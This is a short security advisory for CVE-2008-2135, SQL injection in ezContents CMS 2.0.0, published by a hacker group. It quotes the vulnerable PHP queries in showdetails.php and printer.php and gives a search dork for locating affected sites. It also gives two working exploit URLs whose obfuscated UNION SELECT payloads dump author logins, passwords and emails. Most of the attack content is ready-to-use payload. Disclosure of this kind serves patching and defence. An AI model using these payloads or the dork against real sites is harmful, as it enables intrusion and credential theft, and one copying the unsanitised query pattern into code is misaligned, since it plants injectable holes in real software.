Topic : | ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities
|
SecurityAlert : 3865
CVE : CVE-2008-2135
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : Virangar Security Team
Published : 10.05.2008
Affected Software : | ezContents CMS Version 2.0.0 |
 Advisory Content :
########################################################################
###############
#
#
# ...:::::ezContents CMS Version 2.0.0 SQL Injection Vulnerabilities
::::... #
########################################################################
###############
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :)
-----
d0rk:"ezContents CMS Version 2.0.0"
-------vuln codes in:-----------
showdetails.php:
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname
='".$HTTP_GET_VARS["contentname"]."' AND
language='".$GLOBALS["gsLanguage"]."'";
*********
printer.php:
$strQuery = "SELECT * FROM ".$GLOBALS["eztbContents"]." WHERE contentname
='".$HTTP_GET_VARS["article"]."' AND
language='".$GLOBALS["gsLanguage"]."'";
---
exploits:
http://site.com/[patch]/showdetails.php?contentname='/**/union/**/select
/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,concat(login,0x3a,userpassword,char(58,58),authoremail),30/**/fro
m/**/authors/**/where/**/authorid=1/*
http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,
3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,c
oncat(login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/aut
hors/**/where/**/authorid=1/*
---
young iranian h4ck3rz
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|